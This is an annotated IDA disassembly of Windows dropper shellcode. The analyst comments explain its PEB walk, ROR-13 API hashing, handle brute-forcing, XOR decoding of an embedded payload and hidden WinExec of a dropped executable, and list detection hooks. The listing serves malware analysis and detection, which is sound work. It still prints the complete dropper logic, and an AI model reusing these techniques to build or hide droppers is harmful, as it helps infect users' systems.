seg000:00400D74 ; ---------------------------------------------------------------------------
seg000:00400D74 ; Analyst notes (IDA listing, x86-32 Windows, Intel syntax, stdcall callees).
seg000:00400D74 ;
seg000:00400D74 ; Position-independent dropper shellcode. Flow as visible in this listing:
seg000:00400D74 ;   1. 400D74  walk the PEB to pick a module base (classically kernel32.dll).
seg000:00400D74 ;   2. 400FBD  `call sub_400D89` so that the bytes after the call (an inline
seg000:00400D74 ;              string IDA mis-decoded as arpl/pop/sub) become a pointer.
seg000:00400D74 ;   3. 400D89  resolve 12 exports of that module by name hash (LookupApi,
seg000:00400D74 ;              ROR-13) into a 200h-byte stack frame addressed by edi.
seg000:00400D74 ;   4. 400E60  probe handle values 1,2,3,... until GetFileSize succeeds and
seg000:00400D74 ;              reports > 1000h bytes; read that file and search it for two
seg000:00400D74 ;              8-byte markers (685A2E46h/19810623h, 4B63754Ah/19830112h).
seg000:00400D74 ;   5. 400EEE  create the file named by the inline string, write "MZ\x90\0",
seg000:00400D74 ;              XOR-decode the bytes between the markers and append them,
seg000:00400D74 ;              WinExec that file, then TerminateProcess.
seg000:00400D74 ;
seg000:00400D74 ; Triage / detection hooks grounded in this listing: the hash immediates
seg000:00400D74 ; pushed before each LookupApi call, the two marker constants, the
seg000:00400D74 ; immediate 905A4Dh ("MZ\x90\0"), the GetFileSize-on-consecutive-handles
seg000:00400D74 ; loop, and the DeleteFileA -> CreateFileA -> WriteFile -> WinExec sequence
seg000:00400D74 ; on the same path string.
seg000:00400D74 ;
seg000:00400D74 ; Register roles in sub_400D89: edi = frame base, esi = module base and later
seg000:00400D74 ; the candidate handle, eax/ebx/ecx = scratch. Frame slots (edi+):
seg000:00400D74 ;   +04 file size (low dword)   +08 module base      +10 inline path string
seg000:00400D74 ;   +14 payload start           +18 end marker + 8   +1C..+48 resolved APIs
seg000:00400D74 ;   +5C read buffer             +60 size-high, then the source handle
seg000:00400D74 ;   +64 output handle           +6C "MZ\x90\0"       +70 bytes read/written
seg000:00400D74 ; ---------------------------------------------------------------------------
seg000:00400D74 mov eax, large fs:30h          ; eax = TEB->PEB (fs:[30h] on 32-bit Windows)
seg000:00400D7A mov eax, [eax+0Ch]             ; eax = PEB->Ldr
seg000:00400D7D mov esi, [eax+1Ch]             ; esi = Ldr->InInitializationOrderModuleList.Flink
seg000:00400D80 lodsd                          ; eax = second list entry (Flink of the first)
seg000:00400D81 mov esi, [eax+8]               ; esi = that entry's DllBase; kernel32 on XP-era
seg000:00400D81                                ; Windows, a different DLL on Win7+ -- verify
seg000:00400D84 jmp loc_400FBD                 ; go to the call/pop trampoline at the end
seg000:00400D89
seg000:00400D89 ; =============== S U B R O U T I N E =======================================
seg000:00400D89
seg000:00400D89 ; sub_400D89 -- dropper body. Entered only via `call sub_400D89` at 400FBD.
seg000:00400D89 ; In:    esi = module base from the PEB walk; [esp] = 400FC2 (inline string).
seg000:00400D89 ; Out:   never returns; ends in TerminateProcess via the jmp at 400F64.
seg000:00400D89 ; Stack: reserves 200h bytes and never releases them (moot: the process
seg000:00400D89 ;        is terminated). The frame is not zeroed -- see the ReadFile note.
seg000:00400D89 sub_400D89 proc near ; CODE XREF: seg000:loc_400FBDp
seg000:00400D89 pop eax                        ; call/pop: eax = address of the inline string
seg000:00400D8A sub esp, 200h                  ; local frame
seg000:00400D90 mov edi, esp                   ; edi = frame base for the rest of the routine
seg000:00400D92 mov [edi+8], esi               ; [+08] = module base (passed to every LookupApi)
seg000:00400D95 mov [edi+10h], eax             ; [+10] = path string (DeleteFileA/CreateFileA/WinExec)
seg000:00400D98 push dword ptr [edi+8]         ; LookupApi(hash, base): base is pushed first (arg_4)
seg000:00400D9B push 0C0397ECh ; GlobalAlloc   ; then the ROR-13 hash of the name (arg_0);
seg000:00400D9B                                ; API names below are the listing's own annotations
seg000:00400DA0 call LookupApi
seg000:00400DA5 mov [edi+1Ch], eax             ; [+1C] = GlobalAlloc
seg000:00400DA8 push dword ptr [edi+8]
seg000:00400DAB push 7CB922F6h ; GlobalFree
seg000:00400DB0 call LookupApi
seg000:00400DB5 mov [edi+20h], eax             ; [+20] = GlobalFree
seg000:00400DB8 push dword ptr [edi+8]
seg000:00400DBB push 7C0017A5h ; CreateFileA
seg000:00400DC0 call LookupApi
seg000:00400DC5 mov [edi+24h], eax             ; [+24] = CreateFileA
seg000:00400DC8 push dword ptr [edi+8]
seg000:00400DCB push 0FFD97FBh ; CloseHandle
seg000:00400DD0 call LookupApi
seg000:00400DD5 mov [edi+28h], eax             ; [+28] = CloseHandle
seg000:00400DD8 push dword ptr [edi+8]
seg000:00400DDB push 10FA6516h ; ReadFile
seg000:00400DE0 call LookupApi
seg000:00400DE5 mov [edi+2Ch], eax             ; [+2C] = ReadFile
seg000:00400DE8 push dword ptr [edi+8]
seg000:00400DEB push 0E80A791Fh ; WriteFile
seg000:00400DF0 call LookupApi
seg000:00400DF5 mov [edi+30h], eax             ; [+30] = WriteFile (used at 400F25 and 400F53)
seg000:00400DF8 push dword ptr [edi+8]
seg000:00400DFB push 0C2FFB025h ; DeleteFileA
seg000:00400E00 call LookupApi
seg000:00400E05 mov [edi+34h], eax             ; [+34] = DeleteFileA
seg000:00400E08 push dword ptr [edi+8]
seg000:00400E0B push 76DA08ACh ; SetFilePointer
seg000:00400E10 call LookupApi
seg000:00400E15 mov [edi+38h], eax             ; [+38] = SetFilePointer
seg000:00400E18 push dword ptr [edi+8]
seg000:00400E1B push 0E8AFE98h ; WinExec
seg000:00400E20 call LookupApi
seg000:00400E25 mov [edi+3Ch], eax             ; [+3C] = WinExec
seg000:00400E28 push dword ptr [edi+8]
seg000:00400E2B push 99EC8974h ; CopyFileW
seg000:00400E30 call LookupApi
seg000:00400E35 mov [edi+40h], eax             ; [+40] = CopyFileW -- resolved but never called
seg000:00400E35                                ; anywhere in this listing
seg000:00400E38 push dword ptr [edi+8]
seg000:00400E3B push 78B5B983h ; TerminateProcess
seg000:00400E40 call LookupApi
seg000:00400E45 mov [edi+44h], eax             ; [+44] = TerminateProcess (called at 400FD0)
seg000:00400E48 push dword ptr [edi+8]
seg000:00400E4B push 0DF7D9BADh ; GetFileSize
seg000:00400E50 call LookupApi
seg000:00400E55 mov [edi+48h], eax             ; [+48] = GetFileSize
seg000:00400E58 push dword ptr [edi+10h]
seg000:00400E5B call dword ptr [edi+34h] ; DeleteFileA   -- remove any earlier drop at the path
seg000:00400E5E xor esi, esi                   ; esi = candidate handle value, pre-incremented below
seg000:00400E60
seg000:00400E60 loc_400E60: ; CODE XREF: sub_400D89+E3j
seg000:00400E60 ; sub_400D89+EAj ...
seg000:00400E60 ; Handle brute force: try esi = 1, 2, 3, ... as hFile until GetFileSize
seg000:00400E60 ; succeeds and reports more than 1000h bytes. There is no upper bound, so
seg000:00400E60 ; with no suitable open file this loop never ends. Real handle values are
seg000:00400E60 ; normally multiples of 4, so most probes simply fail.
seg000:00400E60 inc esi
seg000:00400E61 lea eax, [edi+60h]             ; lpFileSizeHigh -> [+60] (overwritten below)
seg000:00400E64 push eax
seg000:00400E65 push esi                       ; hFile = candidate value
seg000:00400E66 call dword ptr [edi+48h] ; GetFileSize
seg000:00400E69 cmp eax, 0FFFFFFFFh            ; INVALID_FILE_SIZE -> not a usable handle
seg000:00400E6C jz short loc_400E60
seg000:00400E6E cmp eax, 1000h
seg000:00400E73 jbe short loc_400E60           ; skip files of 4 KiB or less
seg000:00400E75 mov [edi+4], eax               ; [+04] = low dword of the size (high dword ignored)
seg000:00400E78 mov [edi+60h], esi             ; [+60] = the handle (reuses the size-high slot)
seg000:00400E7B push dword ptr [edi+4]         ; dwBytes = file size
seg000:00400E7E push 40h ; '@'                 ; uFlags = GMEM_ZEROINIT
seg000:00400E80 call dword ptr [edi+1Ch] ; GlobalAlloc
seg000:00400E83 mov [edi+5Ch], eax             ; [+5C] = buffer; a NULL result is not checked
seg000:00400E86 push 0                         ; dwMoveMethod = FILE_BEGIN
seg000:00400E88 push 0                         ; lpDistanceToMoveHigh = NULL
seg000:00400E8A push 0                         ; lDistanceToMove = 0
seg000:00400E8C push dword ptr [edi+60h]       ; hFile
seg000:00400E8F call dword ptr [edi+38h] ; SetFilePointer   -- rewind the source file
seg000:00400E92 cmp eax, 0FFFFFFFFh
seg000:00400E95 jz short loc_400EE2            ; INVALID_SET_FILE_POINTER -> free, next handle
seg000:00400E97 push 0                         ; lpOverlapped = NULL
seg000:00400E99 lea ebx, [edi+70h]
seg000:00400E9C push ebx                       ; lpNumberOfBytesRead -> [+70]
seg000:00400E9D push dword ptr [edi+4]         ; nNumberOfBytesToRead = file size
seg000:00400EA0 push dword ptr [edi+5Ch]       ; lpBuffer
seg000:00400EA3 push dword ptr [edi+60h]       ; hFile
seg000:00400EA6 call dword ptr [edi+2Ch] ; ReadFile   -- return value is not checked
seg000:00400EA9 mov ecx, [edi+70h]             ; ecx = bytes read ...
seg000:00400EAC sub ecx, 10h                   ; ... minus 16 = iteration bound for the scans;
seg000:00400EAC                                ; if ReadFile failed, [+70] is stale stack
seg000:00400EAC                                ; content and the scan length is undefined
seg000:00400EAF mov eax, [edi+5Ch]             ; eax = scan cursor, starts at the buffer
seg000:00400EB2
seg000:00400EB2 loc_400EB2: ; CODE XREF: sub_400D89:loc_400EC4j
seg000:00400EB2 ; Byte-by-byte search for the start marker (dwords 685A2E46h, 19810623h).
seg000:00400EB2 ; `inc eax` precedes the first compare, so buffer[0] is never tested. The
seg000:00400EB2 ; last access is cursor+7 <= buffer + bytesRead - 9, in bounds as long as
seg000:00400EB2 ; bytesRead > 16; a shorter read makes ecx wrap and the scan overruns.
seg000:00400EB2 inc eax
seg000:00400EB3 cmp dword ptr [eax], 685A2E46h
seg000:00400EB9 jnz short loc_400EC4
seg000:00400EBB cmp dword ptr [eax+4], 19810623h
seg000:00400EC2 jz short loc_400EC8            ; start marker found
seg000:00400EC4
seg000:00400EC4 loc_400EC4: ; CODE XREF: sub_400D89+130j
seg000:00400EC4 loop loc_400EB2                ; ecx--, continue while nonzero (loop does not touch flags)
seg000:00400EC6 jmp short loc_400EE2           ; no start marker here -> free buffer, next handle
seg000:00400EC8 ; ---------------------------------------------------------------------------
seg000:00400EC8
seg000:00400EC8 loc_400EC8: ; CODE XREF: sub_400D89+139j
seg000:00400EC8 add eax, 8                     ; step past the 8-byte marker
seg000:00400ECB mov [edi+14h], eax             ; [+14] = first byte of the encoded payload
seg000:00400ECE
seg000:00400ECE loc_400ECE: ; CODE XREF: sub_400D89:loc_400EE0j
seg000:00400ECE ; Search for the end marker (dwords 4B63754Ah, 19830112h). ecx is not
seg000:00400ECE ; reset, so the count left over from the first scan still bounds this one.
seg000:00400ECE inc eax
seg000:00400ECF cmp dword ptr [eax], 4B63754Ah
seg000:00400ED5 jnz short loc_400EE0
seg000:00400ED7 cmp dword ptr [eax+4], 19830112h
seg000:00400EDE jz short loc_400EEE            ; end marker found
seg000:00400EE0
seg000:00400EE0 loc_400EE0: ; CODE XREF: sub_400D89+14Cj
seg000:00400EE0 loop loc_400ECE
seg000:00400EE2
seg000:00400EE2 loc_400EE2: ; CODE XREF: sub_400D89+10Cj
seg000:00400EE2 ; sub_400D89+13Dj
seg000:00400EE2 ; Give-up path (SetFilePointer failed, or a marker was not found):
seg000:00400EE2 ; release the buffer and move on to the next handle value.
seg000:00400EE2 push dword ptr [edi+5Ch]
seg000:00400EE5 call dword ptr [edi+20h]       ; GlobalFree(buffer)
seg000:00400EE8 jnz loc_400E60                 ; branches on whatever flags GlobalFree left --
seg000:00400EE8                                ; nothing in the calling convention guarantees
seg000:00400EE8                                ; them. Should ZF be set here, execution falls
seg000:00400EE8                                ; into loc_400EEE with a stale eax and a freed
seg000:00400EE8                                ; buffer. Confirm the real behaviour dynamically.
seg000:00400EEE
seg000:00400EEE loc_400EEE: ; CODE XREF: sub_400D89+155j
seg000:00400EEE add eax, 8                     ; step past the end marker
seg000:00400EF1 mov [edi+18h], eax             ; [+18] = end marker + 8; payload length = [+18]-[+14]-8
seg000:00400EF4 push 0                         ; hTemplateFile = NULL
seg000:00400EF6 push 80h ; 'Ç'                 ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
seg000:00400EFB push 2                         ; dwCreationDisposition = CREATE_ALWAYS
seg000:00400EFD push 0                         ; lpSecurityAttributes = NULL
seg000:00400EFF push 0                         ; dwShareMode = 0
seg000:00400F01 push 40000000h                 ; dwDesiredAccess = GENERIC_WRITE
seg000:00400F06 push dword ptr [edi+10h]       ; lpFileName = the inline path string
seg000:00400F09 call dword ptr [edi+24h] ; CreateFileA
seg000:00400F0C mov [edi+64h], eax             ; [+64] = output handle; INVALID_HANDLE_VALUE not checked
seg000:00400F0F mov dword ptr [edi+6Ch], 905A4Dh   ; bytes 4D 5A 90 00 = "MZ\x90\0", the start of
seg000:00400F0F                                ; a DOS header, written separately -- presumably
seg000:00400F0F                                ; the carrier stores the PE without these bytes
seg000:00400F0F                                ; so a plain "MZ" scan of the carrier misses it
seg000:00400F16 push 0                         ; lpOverlapped = NULL
seg000:00400F18 lea ebx, [edi+70h]
seg000:00400F1B push ebx                       ; lpNumberOfBytesWritten -> [+70]
seg000:00400F1C push 4                         ; nNumberOfBytesToWrite = 4
seg000:00400F1E lea ebx, [edi+6Ch]
seg000:00400F21 push ebx                       ; lpBuffer = &"MZ\x90\0"
seg000:00400F22 push dword ptr [edi+64h]       ; hFile = output handle
seg000:00400F25 call dword ptr [edi+30h] ; WriteFile
seg000:00400F28 mov eax, [edi+18h]
seg000:00400F2B sub eax, [edi+14h]
seg000:00400F2E sub eax, 8                     ; eax = payload length (bytes between the markers)
seg000:00400F31 mov ebx, [edi+14h]             ; ebx = payload cursor (inside the GlobalAlloc buffer)
seg000:00400F34
seg000:00400F34 loc_400F34: ; CODE XREF: sub_400D89+1B2j
seg000:00400F34 ; In-place decode: each byte is XORed with the low byte of the remaining
seg000:00400F34 ; count, i.e. payload[i] ^= (len - i) & 0FFh. A zero length would wrap
seg000:00400F34 ; eax and run the loop over 4 GiB.
seg000:00400F34 xor [ebx], al
seg000:00400F36 inc ebx
seg000:00400F37 dec eax
seg000:00400F38 cmp eax, 0                     ; redundant: dec already set ZF
seg000:00400F3B jnz short loc_400F34
seg000:00400F3D push 0                         ; lpOverlapped = NULL
seg000:00400F3F lea ebx, [edi+70h]
seg000:00400F42 push ebx                       ; lpNumberOfBytesWritten -> [+70]
seg000:00400F43 mov ebx, [edi+18h]
seg000:00400F46 sub ebx, [edi+14h]
seg000:00400F49 sub ebx, 8                     ; same length computation as at 400F28
seg000:00400F4C push ebx                       ; nNumberOfBytesToWrite = payload length
seg000:00400F4D push dword ptr [edi+14h]       ; lpBuffer = decoded payload
seg000:00400F50 push dword ptr [edi+64h]       ; hFile = output handle
seg000:00400F53 call dword ptr [edi+30h] ; WriteFile -- the listing's "CloseHandle" label here was
seg000:00400F53                                ; wrong: [+30] was filled from the WriteFile hash at
seg000:00400F53                                ; 400DF5, and five arguments are pushed; CloseHandle
seg000:00400F53                                ; is the one-argument call that follows
seg000:00400F56 push dword ptr [edi+64h]
seg000:00400F59 call dword ptr [edi+28h]       ; CloseHandle(output handle); the source handle
seg000:00400F59                                ; found by the probe loop is never closed
seg000:00400F5C push 0                         ; uCmdShow = SW_HIDE
seg000:00400F5E push dword ptr [edi+10h]       ; lpCmdLine = path of the file just written
seg000:00400F61 call dword ptr [edi+3Ch] ; WinExec   -- run the dropped file
seg000:00400F64 jmp short near ptr loc_400FCA+2   ; -> 400FCC, inside IDA's mis-decoded `add`
seg000:00400F64                                ; (see loc_400FCA); leads to TerminateProcess
seg000:00400F64 sub_400D89 endp
seg000:00400F64
seg000:00400F64 ; ---------------------------------------------------------------------------
seg000:00400F66 db 90h ; É                     ; NOP padding between the two routines
seg000:00400F67 db 90h ; É
seg000:00400F68 db 90h ; É
seg000:00400F69
seg000:00400F69 ; =============== S U B R O U T I N E =======================================
seg000:00400F69
seg000:00400F69 ; Attributes: bp-based frame
seg000:00400F69
seg000:00400F69 ; LookupApi -- resolve an export of a loaded PE image by name hash.
seg000:00400F69 ; C-equivalent: void *__stdcall LookupApi(DWORD hash, void *imageBase)
seg000:00400F69 ; In:   arg_0 = hash, arg_4 = image base (DOS header). Walks the export
seg000:00400F69 ;       directory: AddressOfNames (+20h), AddressOfNameOrdinals (+24h),
seg000:00400F69 ;       AddressOfFunctions (+1Ch).
seg000:00400F69 ; Out:  eax = VA of the matching export. `retn 8` pops both arguments.
seg000:00400F69 ; Hash: h = 0; for each name byte c until NUL: h = ror(h, 13) + c.
seg000:00400F69 ; Clobbers: ebx (never saved -- a caller keeping a value in ebx across this
seg000:00400F69 ;       call loses it; sub_400D89 happens not to), ecx, edx, flags.
seg000:00400F69 ; Missing checks: NumberOfNames is never consulted, so an unmatched hash
seg000:00400F69 ;       walks past the end of the name table; forwarded exports are not
seg000:00400F69 ;       recognised.
seg000:00400F69 LookupApi proc near ; CODE XREF: sub_400D89+17p
seg000:00400F69 ; sub_400D89+27p ...
seg000:00400F69
seg000:00400F69 arg_0 = dword ptr 8
seg000:00400F69 arg_4 = dword ptr 0Ch
seg000:00400F69
seg000:00400F69 push ebp
seg000:00400F6A mov ebp, esp
seg000:00400F6C push edi
seg000:00400F6D mov edi, [ebp+arg_0]           ; edi = target hash
seg000:00400F70 mov ebx, [ebp+arg_4]           ; ebx = image base (caller's ebx is not preserved)
seg000:00400F73 push esi
seg000:00400F74 mov esi, [ebx+3Ch]             ; e_lfanew
seg000:00400F77 mov esi, [esi+ebx+78h]         ; NT headers + 78h = export directory RVA (PE32)
seg000:00400F7B add esi, ebx                   ; esi = IMAGE_EXPORT_DIRECTORY*
seg000:00400F7D push esi                       ; keep the export directory for after the loop
seg000:00400F7E mov esi, [esi+20h]             ; AddressOfNames RVA
seg000:00400F81 add esi, ebx                   ; esi = cursor into the name-RVA table
seg000:00400F83 xor ecx, ecx
seg000:00400F85 dec ecx                        ; ecx = -1: name index, pre-incremented below
seg000:00400F86
seg000:00400F86 loc_400F86: ; CODE XREF: LookupApi+36j
seg000:00400F86 inc ecx                        ; next name index
seg000:00400F87 lodsd                          ; eax = name RVA; esi advances to the next entry
seg000:00400F88 add eax, ebx                   ; eax = name string
seg000:00400F8A push esi                       ; save the table cursor; esi now accumulates the hash
seg000:00400F8B xor esi, esi
seg000:00400F8D
seg000:00400F8D loc_400F8D: ; CODE XREF: LookupApi+31j
seg000:00400F8D movsx edx, byte ptr [eax]      ; dl = byte, dh = its sign extension (00h or 0FFh)
seg000:00400F90 cmp dh, dl                     ; equal only for 00h (terminator) -- or a 0FFh byte
seg000:00400F92 jz short loc_400F9C
seg000:00400F94 ror esi, 0Dh                   ; the common ROR-13 export-name hash
seg000:00400F97 add esi, edx                   ; sign-extended add; harmless for ASCII names
seg000:00400F99 inc eax
seg000:00400F9A jmp short loc_400F8D
seg000:00400F9C ; ---------------------------------------------------------------------------
seg000:00400F9C
seg000:00400F9C loc_400F9C: ; CODE XREF: LookupApi+29j
seg000:00400F9C cmp edi, esi                   ; hash match?
seg000:00400F9E pop esi                        ; restore the table cursor (pop preserves flags)
seg000:00400F9F jnz short loc_400F86           ; no -> next name; no NumberOfNames bound
seg000:00400FA1 pop edx                        ; edx = export directory
seg000:00400FA2 mov ebp, ebx                   ; ebp = image base for the rest of the routine
seg000:00400FA2                                ; (frame pointer comes back with `pop ebp`)
seg000:00400FA4 mov ebx, [edx+24h]             ; AddressOfNameOrdinals RVA
seg000:00400FA7 add ebx, ebp
seg000:00400FA9 mov cx, [ebx+ecx*2]            ; ecx = ordinal; 16-bit write, so the upper half
seg000:00400FA9                                ; of ecx keeps the index's upper half, which is
seg000:00400FA9                                ; zero for any realistic name count
seg000:00400FAD mov ebx, [edx+1Ch]             ; AddressOfFunctions RVA
seg000:00400FB0 add ebx, ebp
seg000:00400FB2 mov eax, [ebx+ecx*4]           ; function RVA (a forwarder RVA is not detected)
seg000:00400FB5 add eax, ebp                   ; eax = function VA
seg000:00400FB7 pop esi
seg000:00400FB8 pop edi
seg000:00400FB9 pop ebp
seg000:00400FBA retn 8
seg000:00400FBA LookupApi endp
seg000:00400FBA
seg000:00400FBD ; ---------------------------------------------------------------------------
seg000:00400FBD
seg000:00400FBD loc_400FBD: ; CODE XREF: seg000:00400D84j
seg000:00400FBD ; call/pop trampoline: the return address pushed here (400FC2) is the
seg000:00400FBD ; address of inline data that sub_400D89 pops into eax. IDA has decoded
seg000:00400FBD ; that data as instructions; the three lines after the call never execute.
seg000:00400FBD call sub_400D89
seg000:00400FC2 arpl [edx], di                 ; data, not code: the dropped file's path as a
seg000:00400FC4 pop esp                        ; NUL-terminated ASCII string. By opcode encoding
seg000:00400FC5 sub eax, 6578652Eh             ; these three lines are 63 3A 5C 2D 2E 65 78 65,
seg000:00400FC5                                ; i.e. "c:\-.exe" (the imm32 alone is ".exe");
seg000:00400FC5                                ; re-decode 400FC2.. as a string to confirm.
seg000:00400FCA
seg000:00400FCA loc_400FCA: ; CODE XREF: sub_400D89+1DBj
seg000:00400FCA add [eax-95FF96h], dl          ; also mis-decoded (bytes 00 90 6A 00 6A FF):
seg000:00400FCA                                ; 400FCA = the string's terminator, 400FCB = NOP,
seg000:00400FCA                                ; and the jmp from 400F64 lands at 400FCC where
seg000:00400FCA                                ; 6A 00 / 6A FF read as `push 0` / `push -1`,
seg000:00400FCA                                ; i.e. TerminateProcess(-1, 0) on the current
seg000:00400FCA                                ; process. Re-disassemble from 400FCC to confirm.
seg000:00400FD0 call dword ptr [edi+44h] ; TerminateProcess   -- end of the shellcode; edi is
seg000:00400FD0                                ; still sub_400D89's frame base